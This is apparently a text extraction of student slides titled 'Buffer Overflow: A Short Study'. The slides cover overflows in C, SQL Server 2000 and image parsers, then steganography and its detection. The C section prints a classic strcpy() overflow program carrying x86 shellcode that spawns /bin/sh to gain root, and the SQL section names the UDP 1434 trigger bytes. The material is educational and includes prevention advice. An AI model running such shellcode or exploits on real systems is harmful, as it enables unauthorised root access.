BUFFER OVERFLOW: A SHORT STUDY

Jonathan HutchisonRobert Lee

Connor MahoneyCaleb Wherry

Overview

Buffer OverflowsC/C++SQLImages

SteganogrophyTraditionalDigital

Basic Concepts

Buffer Stack Memory Heap Memory Buffer Overflow C/C++ SQL Steganogrophy

C/C++ Buffer Overflow Vulnerabilities

C/C++ On Older Linux Machines Easiest to exploit. Few protections against segmentation faults. Many simple programs can cause serious

damage on these machines. Code Libraries

Not trusted libraries. Unstable functions. Unsecured error checking.

C/C++ Buffer Overflow Vulnerabilities (cont.)

Exploitation Using Shell Code Shell Code Unstable C commands

C Example: Use of shell code to switch the user to “root” Use of “strcpy()” function in C to cause a

buffer overflow. Dangerous for someone running an unsecured

Linux machine.

#include <stdio.h>#include <string.h>char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; // Shell code that will be executed once the buffer is

// over flown. It allows us to change the stance of our // login to “root”.

char large_string[128];int main(int argc, char *argv[]) { char buffer[96]; // buffer to overflow int i; long *long_ptr = (long *)large_string; for (i = 0; i < 32; i++) // These for loops take the shell code and

// translate it into the large string and then // in turn puts a full buffer into

each // pointer value of the large_string

*(long_ptr + i) = (int)buffer;for (i = 0; i < (int)strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer, large_string); // The string copy function in C should be used

// with the utmost caution. This is where the code // blows up and causes the program to execute

the // rest of the shell code on the command line.

return 0;}

Prevention of Buffer Overflow In C/C++

Use only trusted libraries when writing code.

Use updated software that helps prevent overflow.

Make sure your code checks the user input.

Use trusted programs, don’t use untested software.

Prevention of Buffer Overflow In C/C++ (cont.)

Administrative Point of View Don’t compromise quality for quantity. Don’t rush deadlines. Make sure your programmers are happy and

comfortable. Working conditions matter. Error checking for all inputs is a must. Don’t cut corners. Use software such as Flawfinder and Viega’s

RATS for possible code problems.

Buffer Overflow In SQL

SQL – Structured Query Language Popular query language for relational database

management.

In 2002, a Buffer Overflow vulnerability was discovered in Microsoft SQL Server 2000.

Both Stack based and Heap based attacks.

Attacks carried out through UDP port 1434 SQL Monitor Port Commonly used by legitimate clients attempting

to connect. Single byte packet, set to 0x02

Stack Based Buffer Overflow Attack

First byte set to 0x04

Instructs SQL monitor to open registry key

If followed by a large number of bytes, stack based buffer is overflowed.

Return address overwritten

Redirects SQL server process to execute code of attackers choice.

Heap Based Buffer Overflow Attack

Carried out using similar technique First byte set to 0x08 followed by a message

with a certain format. Formatted properly, attack avoids access

violation errors before heap is overflowed.

Vulnerability in SQL server 2000 code Return values not validated Unhandled exceptions Current process fails, resulting effectively in a

denial of service attack.

Buffer Overflow In Images

iPhonewww.jailbreakme.comAlter file header in TIFF imageNew memory pointerCrashes browserUnlocks file system

Other exploits

Windows JPEG (GDI+ API) BMP GIF

Linux PNG

Macintosh, iPhone, & PSP TIFF

Traditional Stegenogrophy

Image from a laser printer under 10x magnification

Traditional Steganogrophy (cont)

Digital Steganogrophy

How it works Each pixel has 24 bits for 3 colors (255

shades/color) Change 1 or 2 color bits every pixel Adds up quickly Bits can be encoded & decoded with a

program No quality or size difference

Images Video Audio

Detection and Prevention

Compare with an original by checksum

Check same color pixels for different values

Statistical analysis

Algorithm detection

Compression & formatting

Example

Original imageHidden image